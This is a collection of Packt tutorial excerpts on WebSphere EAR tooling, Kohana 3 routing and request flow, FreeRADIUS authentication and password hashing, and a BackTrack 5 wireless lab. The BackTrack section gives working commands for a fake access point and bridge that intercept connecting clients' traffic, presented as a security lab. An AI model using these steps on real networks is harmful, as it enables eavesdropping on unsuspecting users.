The EAR is then re-packaged using the EARExpander -operation collapse option to recreate the EAR file once the find-and-replace routine has completed. An example of how to collapse an expanded EAR file is as follows: For Linux: <was_root>/bin/EARExpander.sh -ear /tmp/collapsed/HRListerEAR.ear -operationDir /tmp/expanded -operation collapse -expansionFlags all -verbose For Windows: <was_root>binEARExpander.bat -ear c:tempcollapsedHRListerEAR. ear -operationDir c:tempexpanded -operation collapse -expansionFlags all -verbose In the previous command line examples, the folder called EARExpander contains an expanded HRListerEAR.ear file, which was created when we used the -expand command example previously. To collapse the files back into an EAR file, use the -collapse option, as shown previously in the command line example. Collapsing the EAR folders results in a file called HRListerEAR.ear, which is created by collapsing the expanded folder contents back into a single EAR file. IBM Support Assistant IBM Support Assistant can help you locate technical documents and fixes, and discover the latest and most useful support resources available. IBM Support Assistant can be customized for over 350 products and over 20 tools, not just WebSphere Application Server. The following is a list of the current features in IBM Support Assistant: Search Information Search and filter results from a number of different websites and IBM Information Centers with just one click. Product Information Provides you with a page full of related resources specific to the IBM software you are looking to support. It also lists the latest support news and information, such as the latest fixes, APARs, Technotes, and other support data for your IBM product. Find product education and training materials Using this feature, you can search for online educational materials on how to use your IBM product. Media Viewer The media viewer allows you search and find free education and training materials available on the IBM Education Assistant sites. You can also watch Flash-based videos, read documentation, view slide presentations, or download for offline access. Automate data collection and analysis Support Assistant can help you gather the relevant diagnostic information automatically so you do not have to manually locate the resources that can explain the cause of the issue. With its automated data collection capabilities, ISA allows you to specify the troublesome symptom and have the relevant information automatically gathered in an archive. You can then look through this data, analyze it with the IBM Support Assistant tool, and even forward data to IBM support. Generate IBM Support Assistant Lite packages for any product addon that has data collection scripts. You can then export a lightweight Java application that can easily be transferred to remote systems for remote data connection. Analysis and troubleshooting tools for IBM products ISA contains tools that enable you to troubleshoot system problems. These include: analyzing JVM core dumps and garbage collector data, analyzing system ports, and also getting remote assistance from IBM support. Guided Troubleshooter This feature provides a step-by-step troubleshooting wizard that can be used to help you look for logs, suggest tools, or recommend steps on fixing the problems you are experiencing. Remote Agent technology Remote agent capabilities through the feature pack provide the ability to perform data collection and file transfer through the workbench from remote systems. 
Note that the Remote agents must be installed and configured with appropriate 'root-level' access. ISA is a very detailed tool and we cannot cover every feature in this article. However, for a demonstration, we will install ISA and then update ISA with an add-on called the Log Analyzer. We will use the Log Analyzer to analyze a WAS SystemOut.log file. Downloading the ISA workbench To download ISA you will require your IBM user ID. The download can be found at the following URL: http://www-01.ibm.com/software/support/isa/download.html It is possible to download both Windows and Linux versions.
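Returning to the deployment-script usage of EARExpander mentioned earlier, a typical automation step might look like the following sketch. The WAS_ROOT location, directory names, and the hostname being replaced are assumptions for illustration only:

#!/bin/sh
WAS_ROOT=/opt/IBM/WebSphere/AppServer

# Expand the archive into a working directory
$WAS_ROOT/bin/EARExpander.sh -ear /tmp/HRListerEAR.ear -operationDir /tmp/expanded -operation expand -expansionFlags all

# Replace an assumed hardcoded hostname in any properties files
find /tmp/expanded -name "*.properties" -exec sed -i 's/devhost.example.com/prodhost.example.com/g' {} \;

# Collapse the edited directory back into a deployable EAR
mkdir -p /tmp/collapsed
$WAS_ROOT/bin/EARExpander.sh -ear /tmp/collapsed/HRListerEAR.ear -operationDir /tmp/expanded -operation collapse -expansionFlags all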
BackTrack 5: Advanced WLAN Attacks

Packt
13 Sep 2011
4 min read
  (For more resources on BackTrack, see here.) Man-in-the-Middle attack MITM attacks are probably one of the most potent attacks on a WLAN system. There are different configurations that can be used to conduct the attack. We will use the most common one: the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidentally get connected to this fake access point and may continue to believe that he is connected to the legitimate access point. The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces. In the following lab exercise, we will simulate this attack. Time for action – Man-in-the-Middle attack Follow these instructions to get started: To create the Man-in-the-Middle attack setup, we will first create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm -c 11 mon0: It is important to note that airbase-ng, when run, creates an interface at0 (tap interface). Think of this as the wired-side interface of our software-based access point mitm. Let us now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless (at0) interfaces. The succession of commands used for this is: brctl addbr mitm-bridge, brctl addif mitm-bridge eth0, brctl addif mitm-bridge at0, ifconfig eth0 0.0.0.0 up, ifconfig at0 0.0.0.0 up: We can assign an IP address to this bridge and check the connectivity with the gateway. Please note that we could do the same using DHCP as well. We can assign an IP address to the bridge interface with the command ifconfig mitm-bridge 192.168.0.199 up. We can then try pinging the gateway 192.168.0.1 to ensure we are connected to the rest of the network: Let us now turn on IP forwarding in the kernel, so that routing and packet forwarding can happen correctly, using echo 1 > /proc/sys/net/ipv4/ip_forward: Now let us connect a wireless client to our access point mitm. It would automatically get an IP address over DHCP (server running on the wired-side gateway). The client machine in this case receives the IP address 192.168.0.197. We can ping the wired-side gateway 192.168.0.1 to verify connectivity: We see that the host responds to the ping requests as seen: We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine: It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired side, we have full control over the traffic. We can verify this by starting Wireshark and sniffing on the at0 interface: Let us now ping the gateway 192.168.0.1 from the client machine. We can now see the packets in Wireshark (apply a display filter for ICMP), even though the packets are not destined for us. This is the power of Man-in-the-Middle attacks! What just happened? We have successfully created the setup for a wireless Man-in-the-Middle attack. We did this by creating a fake access point and bridging it with our Ethernet interface. This ensured that any wireless client connecting to the fake access point would "perceive" that it is connected to the Internet via the wired LAN. 
Have a go hero – Man-in-the-Middle over pure wireless In the previous exercise, we bridged the wireless interface with a wired one. As we noted earlier, this is one of the possible connection architectures for an MITM. There are other combinations possible as well. An interesting one would be to have two wireless interfaces, one creates the fake access point and the other interface is connected to the authorized access point. Both these interfaces are bridged. So, when a wireless client connects to our fake access point, it gets connected to the authorized access point through the attacker machine. Please note that this configuration would require the use of two wireless cards on the attacker laptop. Check if you can conduct this attack using the in-built card on your laptop along with the external one. This should be a good challenge!
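For convenience, the commands used in the preceding exercise are collected below; the interface names, channel, and IP address are the ones used in the text and will differ on your own setup:

# Create the soft access point; airbase-ng creates the at0 tap interface
airbase-ng --essid mitm -c 11 mon0

# Bridge the wired (eth0) and wireless (at0) interfaces
brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up

# Give the bridge an address (DHCP would also work) and enable IP forwarding
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward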

Routing in Kohana 3

Packt
12 Sep 2011
8 min read
  (For more resources on this topic, see here.) The reader can benefit from the previous article on Request Flow in Kohana 3. Routing in Kohana If you remember, the bootstrap file comes preconfigured with a default route that follows a very simple structure: Route::set(‘default’, ‘(<controller>(/<action>(/<id>)))’) ->defaults(array( ‘controller’ => ‘welcome’, ‘action’ => ‘index’, )); This tells Kohana that when it parses the URL for any request, it first finds the base_url, and then the next segment will contain the controller, then the action, then an ID. These are all optional setgments, with the default controller and action being set in the array. We have taken advantage of this route with other controllers like our Profile and Message controller. When we visit http://localhost/egotist/profile, the route sets the controller to profile, and since no action or ID is explicitly defined in the URL, the default action of ‘index’ is used. When we requested http://localhost/egotist/messages/get_messages from within our Profile Controller, we also followed this route; however, neither defaults were needed, and the route asked for the Messages Controller and its get_messages action. In our Profile controller, we are only using one array of example messages to test functionality and the expected behavior of our application. When we implement a data store and have multiple users with profiles in our application, we will need a way to decipher which profile a user wants to see. Because the default route already has an available parameter for ID, we can use that to pass an ID to our Profile Controller’s index action, and have the messages controller then find the proper messages for that user.   Time for action – Making profiles dynamic using ID Once a database is tied to our application, and more than one user has a profile, we will need some way of knowing which profile to display. A simple and effective way to do this is to pass a user ID in the route, and have our controller use that ID to find the right messages for the right user. Let’s add some more test data to our messages system, and use an ID to display the right messages. Open the Profile Controller in our application/classes/controller/ directory named profile.php. Since the action_index() method is the controller action that is called when a profile is viewed, we will need to edit it to look for the ID parameter in the URI like this: public function action_index(){ $content = View::factory(<profile/public>) ->set(<username>, <Test User>) ->bind(<messages>, $messages); $id = (int) $this->request->param(‘id’); $messages_uri = "messages/get_messages/$id"; $messages = Request::factory($messages_uri)->execute()->response; $this->template->content = $content;} Now, we are retrieving the ID from the route and passing it along in our request to the Messages Controller. This means that class must also be updated. Open the messages.php file located in application/classes/controllers/ and modify its action_get_messages() method as follows: public function action_get_messages(){ $id = (int) $this->request->param(‘id’); $messages = array( 1 => array( ‘This is test message one for user 1’, ‘This is test message two for user 1’, ‘This is test message three for user 1’ ), 2 => array( ‘This is test message one for user 2’, ‘This is test message two for user 2’, ‘This is test message three for user 2’ ) ); $messages = array_key_exists($id, $messages) ? 
$messages[$id] :NULL; $this->request->response = View::factory(‘profile/messages’) ->set(‘messages’, $messages);} Open the page http://localhost/egotist/profile/index/2/. It should look like this: Browsing to http://localhost/egotist/profile/index/1/ will show the messages for user 1, i.e., the test messages placed in the message array under key 1. What just happened? At the very beginning of our index action in our Profile Controller, we set our $id variable by getting the ID parameter from the route. Since Kohana has parsed our route for us, we can now access these parameters via the request object’s param() method. Once we got the ID variable, we then created and executed the request for the message controller’s get_messages action, and passed the ID to that method for it to use. In the Message Controller, we used the same method to extract the ID from the request, and then used that ID to determine which messages from the messages array to display. Although this works fine for illustrating routing for these two users, the code is far from ready, even without a data store or real user data, but it does show how the parameters can be read and used. Because most of the functionality in the controller will be replaced with our database and more precise data being passed around, we can overlook the incompleteness of the current controller actions, and begin looking at creating a URL that is better looking than http://localhost/egotist/profile/index/2/ for finding a user profile by ID. Creating friendly URLs using custom routes Consider how nice it would be if our users could browse to a profile without putting ‘index’ in the action portion of the URI, like this: http://localhost/egotist/profile/2. This looks much more pleasing, and is more in line with what we would like our URLs to look like in web apps. It is in fact very easy to have Kohana use a route to remove the index action from the URI. Routes not only make our URLs more pleasing and descriptive, but they make our application easier to maintain in the long run. We have more control over where our users are being directed from how the URL is constructed, without having to create controller actions designed to handle routing.   Time for action – Creating a Custom Route So far, we have been using the default route that is in our application bootstrap. As our application grows, so will the number of available ‘starting points’ for our user’s requests. Not every controller, action, or parameter has to comply with the default route, and this gives us a lot of flexibility and freedom. We can add a custom route to handle user’s profiles by adding it to our bootstrap.php file. Open the bootstrap.php file located in application/directory and modify the routes block so it looks like this: /** * Set the routes.Each route must have a minimum of a name,a URI * and a set of defaults for the URI. */Route::set(‘profile’, ‘profile/<id>’) ->defaults(array( ‘controller’ => ‘profile’, ‘action’ => ‘index’, ));Route::set(‘default’, ‘(<controller>(/<action>(/<id>)))’) ->defaults(array( ‘controller’ => ‘welcome’, ‘action’ => ‘index’, )); Now, we can view the profile pages without having to pass the index action in the URL. Open http://localhost/egotist/profile/2 in a browser; it should look like this: Browsing to profiles with a more friendly URL is made possible through Kohana’s routes. What just happened? By setting routes using the Route::set static method, we are essentially creating filters that will be used to match requests with routes. 
We can name these routes; in this case we have one named default, and one named profile. Kohana uses the second parameter in the set() method to compare against the requested URI, and will call the first route that matches the request. Because it uses the first route that matches the request, it is very important when ordering route definitions. If we put the default route before the profile route, the profile route will never be used, as the default route would always match first. Because it looks for a match, it does not use discretion when determining the right route for a request. So if we browse to http://localhost/egotist/profile/index/2, we will be directed to the default route, and get the same result. The default route may not be available for all the routes we create in the future, so create routes that are as explicit as we can for our needs. Right now, our application assumes any data that is passed after a controller segment named ‘profile’ must be the ID for which we are looking. In our current application setup, we only need digits. If a user passes data into the URL that is not numeric for the ID parameter, we do not want it to go to that route. This can be accomplished easily inside the Route::set() method.  
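As a sketch of that approach, Kohana 3's Route::set() accepts an optional third parameter of regular expressions keyed by segment name, so the <id> segment can be restricted to digits and any non-numeric value will simply fall through to the next matching route (assuming the standard Route::set($name, $uri, $regex) signature):

Route::set('profile', 'profile/<id>', array('id' => '\d+'))
    ->defaults(array(
        'controller' => 'profile',
        'action'     => 'index',
    ));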

Request Flow in Kohana 3

Packt
12 Sep 2011
12 min read
  (For more resources on this topic, see here.) The reader can benefit from the previous article on Routing in Kohana 3.   Hierarchy is King in Kohana Kohana is layered in more ways than one. First, it has a cascading files system. This means the framework loads files for each of it’s core parts in a hierarchical order, which is explained in more detail in just a bit. Next, Kohana allows for controllers to initiate requests, making the application workflow follow a hierarchical design pattern. These features are the foundation of HMVC, which essentially is a cascading filesystem, flexible routing and request handling, the ability to execute sub-requests combined with a standard MVC pattern. The framework manages locating and loading the right file by using a core method named Kohana::find_file(). This method searches the filesystem in a predetermined order to load the proper class first. The order the method searches in is (with default paths): Application path (/application) Modules (/modules) as ordered in bootstrap.php System path (/system) Cascading filesystem As the framework loads, it creates a merged filesystem based on the order of loading described above. One of the benefits of loading files this way is the ease to overload classes that would be loaded later in the flow. We never have to, nor should we, alter a file in the system directory. We can override the default behavior of any method by overloading it in the application directory. Another great advantage is the consistency this mechanism offers. We know the exact load order for every class in any application, making it much easier to create custom code and know exactly where it needs to live. This image shows an example application being merged into the final file structure that will be used when completing a request. We can see how some classes in the application layer are overriding files in the modules. This makes it easier to visualize how modules extend and enhance the framework by building on the system core. Our application then sits on top of the system and module files, and then can build and extend the functionality of the module and system layers. Kohana also makes it easy to load third-party libraries, referred to as vendor libraries, into the filesystem. Each of the three layers has five basic folders into which Kohana looks: Classes (/classes) contain all autoloaded class files. This directory includes our Controller, Models, and their supporting classes. Autoloading allows us to use classes without having to include them manually. Any classes inside this directory will automatically be searched and loaded when they are used. Config files (/config) are files containing arrays that can be parsed and loaded using the core method Kohana::config(). Some config files are required to configure and properly load modules, while others may be created by us to make our application easier to maintain, or to keep vendor libraries tidy by moving config data to the framework. Config files are the only files in the cascading filesystem that are not overloaded; all config files are merged with their parent files. Internationalization files (/i18n) make it much easier to create language files that work with our applications to deliver the proper content that best suits the language of our users. Messages (/messages) are much like configuration files, in that they are arrays that are loaded by a core Kohana method. Kohana:: message() parses and returns the messages for a specific array. 
This functionality is very useful when creating forms and actions for our applications. View files (/views) are the presentation layer of our applications, where view files and template files live.   Request flow in Kohana Now that we have seen how the framework merges files to create a set of files to load on request, it is a good place to see the flow of the files in Kohana. Remember that controllers can invoke requests, making a bit of a loop between controllers, models, and views, but the frameworks always runs in the same order, beginning with the index.php file. The index.php file sets the path to the application, modules, and system directories and saves them to as constants that are then defined for global use. These constants are APPPATH, MODPATH, and SYSPATH, and they hold the paths for the application, modules, and system paths respectively. After the error-reporting levels are set, Kohana looks to see if the install.php file exists. If the install file is not found, Kohana takes the next step in loading the framework by loading the core Kohana class. Next, the index file looks for the application’s Kohana class, first in the application directory, then in the system path. This is the first example of Kohana looking for our files before it looks for its own. The last thing the index file does is bootstrap our application, by requiring the bootstrap.php file and loading it. You probably remember having to configure the bootstrap file when we installed Kohana. This is the file in which we set our base URL and modules; however, it is a bit more important than just basic installation and configuration. The boostrap begins by setting a some basic environment settings, like the default timezone and locale. Next, it enables the autoloader, and defines the application environment. This tells the framework whether our application is in a production or development environment, allowing it to make decisions based on its environment-specific settings. Next, the default options are set and Kohana is initialized, with the Kohana::init() method being called. After Kohana’s initialization, it sets up logging, configuration reading, and then modules. Modules are loaded defined using an array, with the module name as the key, and the path to the module as the value. The modules load order is listed in this array, and are all subject to the same rules and conventions as core and application code. Each module is added to the cascading file system as described above, allowing files to override any that may be added later when the system files are merged. Modules can contain their own init files, named init.php, that act similar to the application bootstrap, adding routes specific to the modules for our application to use. The last thing the bootstrap does in a normal request flow is to set the routes for the application. Kohana ships with a default route that loads the index action in the welcome controller. The Route object’s set method accepts an array that defines the name, URI, and defaults for the parameters set for the URI. By setting default controllers, actions, and params, we can have dynamic URLs that have default values if none are passed. If no controller or action is passed in the URI on a vanilla Kohana install, the welcome controller will be loaded, and the index action invoked as outlined in the array passed to the Route::set() method in the boostrap. 
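As a small illustration of the module loading described earlier in this section, the bootstrap's Kohana::modules() call takes exactly this kind of array; the module names and paths below are examples only and will vary from application to application:

Kohana::modules(array(
    'auth'     => MODPATH.'auth',      // basic authentication
    'database' => MODPATH.'database',  // database access
    'orm'      => MODPATH.'orm',       // object-relational mapping
));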
Once all the application routes are set, via the Route::set() method and the init.php files residing in modules, Request::instance() is invoked, setting the request loop into action. As the Request object processes the request, it looks through the routes until it finds the right controller to load. The Request object then instantiates the controller, passing itself in for the controller to use. The Controller::before() method is then called, and acts much like a constructor. Being called first, before() allows any logic that needs to run ahead of a controller action to execute. Once the before() method is complete, the object continues on to the requested action, just as a class carries on once its constructor has finished. The controller action, a method in the controller class, is then called, and once complete it returns the request response. The action method is where the business logic for the request resides. Once the action is complete, the Controller::after() method is called, much like the destructor of a standard PHP class. Because of the hierarchical structure of Kohana, any controller can initiate a new request, making it possible for other controllers to be loaded, invoking more controller actions, which generate their own request responses. Once all the requests have been fulfilled, Kohana renders the final request response.

The Kohana request flow can seem long and complex, but it can also be seen as very clean and organized. By using a front controller design pattern, all requests are handled by just one file: index.php. Each and every request handled by our applications begins with this one file. From there the application is bootstrapped, and then the controller designed to handle the specific request is found, executed, and its output displayed. Although, as we have seen, more is happening behind the scenes, for most of our applications this simple way of looking at the request flow makes it easy to create powerful web applications with Kohana.

Using the Request object

The request flow in Kohana is interesting, and it is easy to see at a high level how it can be powerful, but the best way to understand HMVC and routing in Kohana is to look at some actual code and see the resulting outcome in real-world scenarios. Kohana's Request object determines the proper controller to invoke, and acts as a wrapper for the response. If we look at the Template Controller that we are extending in our Application Controller for the case study site, we can follow the inheritance path back to Kohana's template controller and see the request response. One of the best ways to understand what is happening inside the framework is to drill down through the filesystem and look at the actual code; one of the great advantages of open source frameworks is the ability to read the code that makes the library run. Opening the welcome controller located at application/classes/controller/welcome.php, we see the following class declaration:

class Controller_Welcome extends Controller_Application

Our controller extends another controller, and at the root of this inheritance chain sits the base Controller class. The first thing we see in the base controller class is the declaration of an object property named $request. This variable holds the Kohana_Request object, the object that created the original controller call. In the constructor, we can see that the Kohana_Request object is type-hinted as the argument, and that it sets the $request object property on instantiation.
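Stripped down, the base class described here looks something like the following simplified sketch (the real code lives in system/classes/kohana/controller.php, with system/classes/controller.php providing the transparent-extension stub):

abstract class Controller {

    // The Request that created this controller
    public $request;

    public function __construct(Request $request)
    {
        // The type-hinted Request is stored for the controller actions to use
        $this->request = $request;
    }

    // Empty hooks, overridden by child controllers when needed
    public function before() {}

    public function after() {}
}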
All that is left in the base Controller class is the before() and after() methods, with no functionality of their own. We can then open our Application Controller, located at application/classes/controller/application.php. The class declaration in this controller looks like this:

abstract class Controller_Application extends Controller_Template

In this file, we can see the before() method loading the template view into the template variable, and in the after() method we see the Request object ($this->request) having its response body set, ready to be rendered. This class, in turn, extends the Template Controller. The Template Controller is part of the Kohana system. Since we have not overridden it in our application or modules, the original template controller that ships with Kohana is loaded. It is located at system/classes/controller/template.php, and its class declaration looks like this:

abstract class Controller_Template extends Kohana_Controller_Template

Here things take a twist, and for the first time we have to leave the /classes/controller/ structure to find an inherited class. The Kohana_Controller_Template class lives in system/classes/kohana/controller/template.php. The class is fairly short and simple, and it has this declaration:

abstract class Kohana_Controller_Template extends Controller

This controller (system/classes/controller.php) is the base controller that all requested controller classes must extend. Examining this class lets us see the Request class enter the controller loop and the template view get sent to the Request object as the response.

Walking through the Welcome Controller's heritage is a great way of seeing how the Request object loads a controller, and how the parent classes all contribute to the request flow in Kohana. It may seem like pointless complexity at first; however, the benefits of transparent extension are very powerful, and Kohana makes the mechanisms work entirely behind the scenes. One question still remains: how is the Request object aware of the controllers and routes?

Although dissecting Kohana's Request class could be an article unto itself, a lot can be answered by looking at the constructor in the system/classes/kohana/request.php file. The constructor is given the URI and then stores the object properties that the object will later use to execute the request. The Request class also has a couple of key methods that can be very helpful: Request::controller(), which returns the name of the controller for the request, and Request::action(), which similarly returns the name of the action. After loading the routes, the constructor iterates through them, determines which one matches the URI, and sets the controller, action, and parameters for the route. If there are no matches for optional segments of the route, the defaults are stored in the object properties instead.

When the Request object's execute() method is called, the request is processed and the response is returned. This happens by first running the before() method, then the controller action being requested, then the after() method for the class, followed by any other requests until all have completed.

The topic of initiating a request from within a controller has come up a few times, and it is the best way to illustrate the hierarchical aspect of HMVC. Let's take a look at this process by creating a controller method that initiates a new request, and see how it completes.
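The controller, URI, views, and the content variable on the template below are made up purely for illustration; they are not part of the case study. Note also that the exact return value of execute() depends on the Kohana version: in the 3.0 series the executed Request exposes its output through its response property, while later releases return a Response object instead.

<?php defined('SYSPATH') or die('No direct script access.');

class Controller_Dashboard extends Controller_Application {

    public function action_index()
    {
        // Fire an internal (HMVC) sub-request from inside this action.
        // The sub-request runs through the same route matching, before(),
        // action, and after() cycle as the original browser request.
        $summary = Request::factory('stats/summary')->execute()->response;

        // Embed the sub-request output in this controller's own view
        $this->template->content = View::factory('dashboard/index')
            ->set('summary', $summary);
    }
}

Because the sub-request is a full request in its own right, the stats controller never needs to know whether it was called by a browser or by another controller, which is exactly the decoupling HMVC is meant to provide.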

FreeRADIUS: Working with Authentication Methods

Packt
08 Sep 2011
6 min read
Authentication is a process where we establish whether someone is who he or she claims to be. The most common way is by a unique username and password. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches authentication methods and how they work. Extensible Authentication Protocol (EAP) is covered later in a dedicated article. In this article we shall:

Discuss the PAP, CHAP, and MS-CHAP authentication protocols
See when and how authentication is done in FreeRADIUS
Explore ways to store passwords
Look at other authentication methods

(For more resources on this subject, see here.)

Authentication protocols

This section will give you background on three common authentication protocols, each of which involves the supply of a username and password. The radtest program uses the Password Authentication Protocol (PAP) by default when testing authentication. PAP is not the only authentication protocol, but it is probably the most generic and widely used. The authentication protocols you should know about are PAP, CHAP, and MS-CHAP. The next article, on the Extensible Authentication Protocol (EAP), will introduce more authentication protocols.

An authentication protocol is typically used on the data link layer that connects the client with the NAS. The network layer is only established after authentication is successful. The NAS acts as a broker, forwarding the requests from the user to the RADIUS server. The data link layer and network layer are layers of the Open Systems Interconnection (OSI) model; a discussion of this model can be found in almost any book on networking: http://en.wikipedia.org/wiki/OSI_model

PAP

PAP was one of the first protocols used to facilitate the supply of a username and password when making point-to-point connections. With PAP the NAS takes the PAP ID and password and sends them in an Access-Request packet as the User-Name and User-Password. PAP is simpler than CHAP and MS-CHAP because the NAS simply hands the RADIUS server a username and password, which are then checked. This username and password come directly from the user, through the NAS, to the server in a single action.

Although PAP transmits passwords in clear text, using it should not always be frowned upon. The password is only in clear text between the user and the NAS; the user's password is encrypted when the NAS forwards the request to the RADIUS server. If PAP is used inside a secure tunnel it is as secure as the tunnel. This is similar to your credit card details being tunnelled inside an HTTPS connection and delivered to a secure web server. HTTPS stands for Hypertext Transfer Protocol Secure and is a web standard that uses Secure Socket Layer/Transport Layer Security (SSL/TLS) to create a secure channel over an insecure network. Once this secure channel is established, we can transfer sensitive data, like credit card details, through it. HTTPS is used daily to secure many millions of transactions over the Internet. A typical captive portal configuration is a good example of this approach.

Of the RADIUS AVPs involved in a PAP request, the value of User-Password is encrypted between the NAS and the RADIUS server. Transporting the user's password from the user to the NAS may, however, be a security risk if it can be captured by a third party.

CHAP

CHAP stands for Challenge-Handshake Authentication Protocol and was designed as an improvement to PAP.
It prevents you from transmitting a cleartext password. CHAP was created in the days when dial-up modems were popular and the concern about PAP's cleartext passwords was high. After a link is established to the NAS, the NAS generates a random challenge and sends it to the user. The user then responds to this challenge by returning a one-way hash calculated over an identifier (sent along with the challenge), the challenge itself, and the user's password. The user's response is then used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS returns CHAP Success or CHAP Failure to the user. The NAS can also request, at random intervals, that the authentication process be repeated by sending a new challenge to the user; this is another reason why it is considered more secure than PAP.

One major drawback of CHAP is that although the password is transmitted encrypted, the password source has to be available in clear text for FreeRADIUS to perform password verification. The FreeRADIUS FAQ discusses the dangers of transmitting a cleartext password compared to storing all the passwords in clear text on the server.

MS-CHAP

MS-CHAP is a challenge-handshake authentication protocol created by Microsoft. There are two versions, MS-CHAP version 1 and MS-CHAP version 2. The challenge sent by the NAS is identical in format to the standard CHAP challenge packet; this includes an identifier and an arbitrary challenge. The response from the user is also identical in format to the standard CHAP response packet. The only difference is the format of the Value field, which is sub-formatted to contain MS-CHAP-specific fields. One of the fields (NT-Response) contains the username and password in a very specific encrypted format. The reply from the user is used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS returns a Success or Failure packet to the user.

The RADIUS server is not involved in sending out the challenge. If you sniff the RADIUS traffic between an NAS and a RADIUS server you can confirm that there is only an Access-Request followed by an Access-Accept or Access-Reject; the sending of a challenge to the user and the receiving of a response is between the NAS and the user.

MS-CHAP also has some enhancements that are not part of CHAP, like the user's ability to change his or her password, or the inclusion of more descriptive error messages. The protocol is tightly integrated with the LAN Manager and NT password hashes. FreeRADIUS will convert a user's cleartext password to an LM-Password and an NT-Password in order to determine whether the password hash that came out of the MS-CHAP request is correct. Although there are known weaknesses in MS-CHAP, it remains widely used and very popular. Never say never: even if your current RADIUS deployment does not require MS-CHAP, cater for the possibility that one day you may use it. The most popular EAP protocol makes use of MS-CHAP, and EAP is crucial in Wi-Fi authentication.

Because MS-CHAP is vendor specific, VSAs instead of AVPs form part of the Access-Request between the NAS and the RADIUS server; these are used together with the User-Name AVP. Now that we know more about the authentication protocols, let's see how FreeRADIUS handles them.
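If you want to watch one of these exchanges yourself, the radtest program mentioned earlier is the quickest way to generate a PAP Access-Request. Assuming the stock localhost client definition with the shared secret testing123, and a test user alice with the password passme, a request can be fired at a server running in debug mode (radiusd -X) like this:

radtest alice passme 127.0.0.1 0 testing123

The arguments are the username, the password, the RADIUS server, the NAS port number, and the shared secret. In the debug output you will see the Access-Request arrive with the User-Name and (encrypted) User-Password AVPs, followed by the Access-Accept or Access-Reject that the server returns.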

Storing Passwords Using FreeRADIUS Authentication

Packt
08 Sep 2011
6 min read
In the previous article we covered the authentication methods used with FreeRADIUS. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches methods for storing passwords and how they work. Passwords do not need to be stored in clear text, and it is better to store them in a hashed format. There are, however, limitations on the kinds of authentication protocols that can be used when passwords are stored as a hash, which we will explore in this article.

(For more resources on this subject, see here.)

Storing passwords

Username and password combinations have to be stored somewhere. The following list mentions some of the popular places:

Text files: You should be familiar with this method by now.
SQL databases: FreeRADIUS includes modules to interact with SQL databases. MySQL is very popular and widely used with FreeRADIUS.
Directories: Microsoft's Active Directory or Novell's eDirectory are typical enterprise-size directories. OpenLDAP is a popular open source alternative.

The users file and the SQL database that can be used by FreeRADIUS store the username and password as AVPs. When the value of this AVP is in clear text, it can be dangerous if the wrong person gets hold of it. Let's see how this risk can be minimized.

Hash formats

To reduce this risk, we can store the passwords in a hashed format. A hashed format of a password is like a digital fingerprint of that password's text value. There are many different ways to calculate this hash, for example MD5 or SHA1. The end result of a hash should be a one-way, fixed-length encrypted string that uniquely represents the password. It should be impossible to retrieve the original password from the hash. To make the hash even more secure and more immune to dictionary attacks we can add a salt to the function that generates the hash. A salt is randomly generated bits used in combination with the password as input to the one-way hash function. With FreeRADIUS we store the salt along with the hash, so it is essential to use a random salt with each hash to make a rainbow table attack difficult.

The pap module, which is used for PAP authentication, supports passwords stored in several hash formats. Both the MD5 and SHA1 hash functions can be used with a salt to make them more secure.

Time for action – hashing our password

We will replace the Cleartext-Password AVP in the users file with a more secure hashed password AVP in this section. There seems to be general confusion about how the hashed password should be created and presented; we will clarify this in order to produce working hashes for each format. A valuable URL to assist us with the hashes is the OpenLDAP FAQ: http://www.openldap.org/faq/data/cache/419.html. It has a few sections that show how to create different types of password hashes, which we can adapt for our own use in FreeRADIUS.

Crypt-Password

Crypt password hashes have their origins in Unix computing. Stronger hashing methods are preferred over crypt, although crypt is still widely used. The following Perl one-liner will produce a crypt password for passme with the salt value of salt:

#> perl -e 'print(crypt("passme","salt")."\n");'

Use this output and change Alice's check entry in the users file from:

"alice" Cleartext-Password := "passme"

to:

"alice" Crypt-Password := "sa85/iGj2UWlA"

Restart the FreeRADIUS server in debug mode and run the authentication request against it again.
Ensure that pap now uses the crypt password by looking for the following line in the FreeRADIUS debug feedback:

[pap] Using CRYPT password "sa85/iGj2UWlA"

MD5-Password

The MD5 hash is often used to check the integrity of a file. When downloading a Linux ISO image you are typically also supplied with the MD5 sum of the file, and you can confirm the integrity of the download by using the md5sum command. We can also generate an MD5 hash from a password. We will use Perl to generate and encode the MD5 hash in the correct format required by the pap module. The creation of this password hash involves external Perl modules, which you may have to install before the script can be used. The following steps show you how:

Create a Perl script with the following contents; we'll name it 4088_04_md5.pl:

#! /usr/bin/perl -w
use strict;
use Digest::MD5;
use MIME::Base64;

unless ($ARGV[0]) {
    print "Please supply a password to create a MD5 hash from.\n";
    exit;
}

my $ctx = Digest::MD5->new;
$ctx->add($ARGV[0]);
print encode_base64($ctx->digest, '')."\n";

Make the 4088_04_md5.pl file executable:

chmod 755 4088_04_md5.pl

Get the MD5 password for passme:

./4088_04_md5.pl passme

Use this output and update Alice's entry in the users file to:

"alice" MD5-Password := "ugGBYPwm4MwukpuOBx8FLQ=="

Restart the FreeRADIUS server in debug mode and run the authentication request against it again. Ensure that pap now uses the MD5 password by looking for the following line in the FreeRADIUS debug feedback:

[pap] Using MD5 encryption.

SMD5-Password

This is an MD5 password with salt. The creation of this password hash also involves external Perl modules, which you may have to install before the script can be used.

Create a Perl script with the following contents; we'll name it 4088_04_smd5.pl:

#! /usr/bin/perl -w
use strict;
use Digest::MD5;
use MIME::Base64;

unless (($ARGV[0]) && ($ARGV[1])) {
    print "Please supply a password and salt to create a salted MD5 hash from.\n";
    exit;
}

my $ctx = Digest::MD5->new;
$ctx->add($ARGV[0]);
my $salt = $ARGV[1];
